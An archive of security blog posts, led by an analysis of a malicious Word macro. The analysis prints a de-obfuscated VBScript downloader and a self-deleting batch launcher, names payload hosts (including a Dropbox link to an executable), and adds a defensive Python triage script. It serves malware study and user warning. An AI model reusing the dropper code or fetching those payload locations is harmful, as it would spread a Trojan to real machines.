Archive
Received a word file from someone – how bad could it be if you open it?
It used to be that executable files (.com, .exe, .zip, .vbs, etc.) were the ones you had to be careful about opening when they arrived in your email. Then came the pictures and URLs embedded in email, which mail clients like Outlook would automatically preview, effectively running them without you ever opening the message. But how bad could it be to open a Word document?
I wanted to spend a little time diving into what you might find circulating around now…
I received a Word document from an unknown sender, so rather than opening it I loaded it on a diagnostic Linux server to see what is inside. (The concern is not anything saved in the body of the document itself but rather the macros that come with it.) ALERT – Geek stuff to follow…
As you view the code you may notice that someone has tried to obfuscate it. This is evident from the names of the functions and is common for developers who wish to make reverse engineering difficult.
This Visual Basic module creates the subroutine that will be executed, wrapped in a loop that continues to run (While True). It also defines a function used to find the temp directory (Environ()).
There is also a module that is responsible for creating the ‘work’ script and then running it.
Below we see that the attackers are beginning to think smarter, not harder. This URL uses a 302 redirect to re-establish the connection over a secure TLS channel to the same host. SSL traffic cannot be sniffed as easily, so this is another attempt to obfuscate the traffic.
Finally, after the third macro is run, we have a connection to a website called mirai2000.com, which starts the exploit. I have tried to de-obfuscate the connection by replacing the variables, to come up with the following script:
strTecation = "pioneer9.exe"                 ' name the payload will be saved under
frgea = "MSXML2.ServerXMLHTTP"               ' ProgID hidden behind a throwaway variable
Set objXMLHTTP = CreateObject(frgea)
objXMLHTTP.open "GET", paytina, False        ' paytina holds the download URL
objXMLHTTP.send()
ahdjqg = "ADODB.Stream"
Set objADOStream = CreateObject(ahdjqg)
objADOStream.Open
objADOStream.Type = 1                        ' 1 = binary stream
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
objADOStream.SaveToFile strTecation          ' write the downloaded executable to disk
objADOStream.Close

@echo off
:nqdjwkn
rem run the VBScript downloader, then use ping as a crude delay
cscript.exe pioneercranberry.vbs
ping 2.2.1.1 -n 4
:windows
rem launch the downloaded payload
pioneer9.exe
:loop
rem another ping delay, then delete both dropper files and retry until they are gone
ping 1.3.1.2 -n 1
del pioneercranberry.vbs
del pioneercranberry.bat
if exist pioneercranberry.bat goto loop
if exist pioneercranberry.vbs goto loop
exit
Analysis:
We see a script that is downloaded as pioneercranberry.vbs (GET /777763172631572.txt from mirai2000.com).
We then download a second file (GET /rara.txt), which in turn downloads a file from Dropbox (https://www.dropbox.com/s/x3igq1hnugevjp0/3d8.exe?dl=1, which appears to be a Windows firewall shell?) and saves it as an executable (pioneer9).
When the file (pioneercranberry.vbs) is run we see a few ping requests to an IP address (2.2.1.1) in France (IP2000-ADSL-BAS).
Next we download an executable (Trojan) from an IP address (66.240.183.19) on the onx.com network using SSL.
Finally we send a single ping to an IP address (1.3.1.2) in China (CHINANET-GD)…hmmm.
I also see evidence of a TeamViewer executable being downloaded from an IP address (178.255.155.118) in Italy (ANEXIA-NET), perhaps as part of the Trojan above, but it fails to run because of a license issue.
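The two dropper scripts above, triaged the way you would on the diagnostic Linux box before anything is executed. This is an added example, not code from the post; the samples are the page's own reconstructed scripts, abridged, and the URL variable `paytina` is left unresolved because the post never shows what it held.

```python
# Added example (not from the original post): static triage of the de-obfuscated
# dropper scripts above, so a similar macro drop can be scored without running it.
import re

# Constructed sample: the VBScript downloader as reconstructed on the page, quotes
# straightened and abridged; the URL variable `paytina` stays unresolved as in the post.
VBS_SAMPLE = (
    'strTecation = "pioneer9.exe"\nfrgea = "MSXML2.ServerXMLHTTP"\n'
    'Set objXMLHTTP = CreateObject(frgea)\nobjXMLHTTP.open "GET", paytina, False\n'
    'objXMLHTTP.send()\nahdjqg = "ADODB.Stream"\nSet objADOStream = CreateObject(ahdjqg)\n'
    'objADOStream.Type = 1\nobjADOStream.Write objXMLHTTP.ResponseBody\n'
    'objADOStream.SaveToFile strTecation\nobjADOStream.Close\n'
)
# Constructed sample: the batch launcher from the page, abridged.
BAT_SAMPLE = (
    '@echo off\n:nqdjwkn\ncscript.exe pioneercranberry.vbs\nping 2.2.1.1 -n 4\n'
    'pioneer9.exe\n:loop\nping 1.3.1.2 -n 1\ndel pioneercranberry.vbs\n'
    'del pioneercranberry.bat\nif exist pioneercranberry.bat goto loop\nexit\n'
)

def resolve_strings(script):
    """Map variable -> literal for simple `name = "text"` lines (the obfuscation layer)."""
    return dict(re.findall(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', script, re.M))

def analyze_vbs(script):
    """Resolve indirect CreateObject() calls and collect downloader indicators."""
    consts = resolve_strings(script)
    lit = lambda a: consts.get(a, a.strip('"'))  # variable name or quoted literal
    progids = [lit(a) for a in re.findall(r'CreateObject\(\s*([^)]+?)\s*\)', script)]
    report = {
        "progids": progids,
        # ProgID passed through a variable rather than written inline
        "indirect_createobject": any(a in consts for a in re.findall(r'CreateObject\(\s*(\w+)\s*\)', script)),
        "http_client": any(p.upper().startswith(("MSXML2.", "WINHTTP.")) for p in progids),
        "binary_stream": "ADODB.Stream" in progids and bool(re.search(r'\.Type\s*=\s*1', script)),
        "saved_files": [lit(a) for a in re.findall(r'\.SaveToFile\s+(\w+|"[^"]*")', script)],
    }
    report["downloader"] = report["http_client"] and report["binary_stream"] and bool(report["saved_files"])
    return report

def analyze_bat(script):
    """Flag the ping-as-sleep trick, the launched payloads and self-deletion."""
    flags = re.M | re.I
    deleted = re.findall(r'^\s*del\s+(\S+)', script, flags)
    return {
        "ping_sleep_count": len(re.findall(r'^\s*ping\s+\S+\s+-n\s+\d+', script, flags)),
        "launches": re.findall(r'^\s*(?:cscript(?:\.exe)?\s+)?(\S+\.(?:vbs|exe))\s*$', script, flags),
        "self_deletes": [f for f in deleted if f.lower().endswith((".bat", ".vbs"))],
    }
```

Run `analyze_vbs(VBS_SAMPLE)` and `analyze_bat(BAT_SAMPLE)`: the first resolves the ProgIDs behind `frgea` and `ahdjqg` and flags the HTTP-to-binary-file chain, the second surfaces the ping delays, the two launched files and the self-deleting cleanup loop.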
——————————–
All of this activity because I opened a Microsoft Word document. All carefully obfuscated to evade virus protection and application-level proxies and filters.
Sophos labels this Trojan as Troj/Agent-AOHW. Unfortunately, as of this morning the site no longer works, so I am unable to complete my analysis.
The moral of this story is…be careful when dealing with ANY file attachment in email. A good rule of thumb: if you didn’t ask for it, DON’T open it.
Got Linux – great! – here is another bot script just for you
I have seen some activity recently in a honeypot I run that shows automated scanning for Apache. The intent of this automated scan seems to be to seek out Apache servers and join them to an IRC botnet using Perl. (For those of you unfamiliar with these terms, I attempt to define them below.)
HoneyPOT (a computer that is intentionally set up as a sacrifice to impersonate well-known services such as Apache for a web server, MySQL for a database, etc.)
BotNET (a collection of computers that can be used by one or more people to hijack your computer and use it to launch attacks, send spam, etc.)
In my research I observed an attempt to download and run a script hosted on a server in Spain (7soles.com). It is then executed using Perl and can provide a host of services, including flooding attacks and spam.
For those of you still reading, I have included the link to the script here. It’s not rocket science, but it looks like a nicely tested platform – resembling point-and-click malware using Internet Relay Chat as a command and control channel. It also looks like it is currently designed to report in to a site in Germany.
For most of my contemporaries this is old news but for the rest of you, welcome to the new Internet. Looks a lot like any North American city in the downtown core – watch your purse and get a carry permit for a handgun.
It’s the FBI and we have your phone surrounded…
Just when you thought it was safe to use your Android smartphone, there are several vulnerabilities you should be aware of (great, now I need to monitor and patch my cell phones too? – yes, Virginia, just one more thing you need to do this week).
There are reported connections from Command and Control (C2) servers located in Canada and Germany for a new piece of ransomware for your phone that impersonates the FBI. Claiming that it detected pornographic images on your phone, the message asks you to pay a fine of $500 and, as proof, shows you a picture of yourself (taken with the front-facing camera) and the phone’s Internet IP address (everyone has a data plan nowadays, right?).
Using a hidden feature of your phone, it can wake the device out of idle and report in to a C2 every minute without any sign that it is doing so (you might notice that your battery life has gotten quite poor, since this requires additional power). It also gives the attackers a way to connect to your device through a backdoor.
Read more about it here – http://blog.fortinet.com/post/locker-an-android-ransomware-full-of-surprises
Edit: This is just another variant of the same ransomware family reported earlier this year (see here). Unfortunately there is no antivirus for mobile phones that has heuristic scanning, so don’t rely on anything you have installed to protect you from these types of attacks.
Security industry reacts to Oracle’s CSO missive | CSO Online
Ever wonder where we will all be in 5 or 10 years? I would never have seen this coming – I mean, this could be an example of professional hubris – read about how the chief security officer at Oracle thought it was time to tell its users to play nicely or ‘we will take our wagon away from you’.
This is just a glimpse of the next version of the end user license agreement (EULA) that we all just click through before using the software it was written for. Judging from the industry reaction it could be a little ways off before a large company like Oracle tries to flex its muscles, but mark my words: reverse engineering software to find holes will likely lead us back to a time before open source. Companies should embrace the open architecture and provide a rich ‘bug bounty’ program if they do not have the talent in-house to keep up with demand.
Read more on the article below and check out the archive of the post before it was pulled off the site.
Just when you thought it was safe to be a Canadian…
Mexicans are fast on their way to mastering the art of ATM fraud, which is fortunate because Americans are still behind the times when it comes to chip and PIN credit cards. I, for one, was happy to extol the benefits of chip cards until I read this story.
ATM ‘Shimmer’ Found in Mexico http://krebsonsecurity.com/2015/08/chip-card-atm-shimmer-found-in-mexico/
Someone has now managed to create a card reader complete with a chip reader, not the magnetic stripe reader we all used to see and hear about. It is so small that it fits inside the ATM’s card reader, so you may never know that it is being used!
So much for chip and pin technology – what are we going to do now?
And now for something completely different…
Almost 35 years ago today, Jeff Wayne prophesied about the end of the world as told by the great Richard Burton in the musical version of War of the Worlds. Who would have guessed that the Perseids meteor shower would be at its greatest tonight, August 12. (perseids-2015)
For those of you who have not heard the musical the story goes something like this…
“..at midnight on the 12th of August a huge mass of luminous gas erupted from Mars and sped toward earth. Across 200 million miles of void, invisibly hurtling towards us came the first of the missiles that were to bring so much calamity to earth.”
Shout out to all those Armageddon peddlers – maybe tonight really does mark the beginning of the end of the world… End of the World
Ubiquiti breach a few months back…
http://www.sec.gov/Archives/edgar/data/1511737/000157104915006288/t1501817_8k.htm
In this Securities and Exchange Commission filing Ubiquiti Networks reports a breach in which someone impersonated an employee in order to transfer almost 50 million dollars.
After noticing the theft and contacting the necessary parties, they were able to recover some of it, but over 30 million still remains missing.
More for companies to worry about as the shift from data to cold hard cash begins. It’s time to get your computer networks in good order or you too can suffer the wrath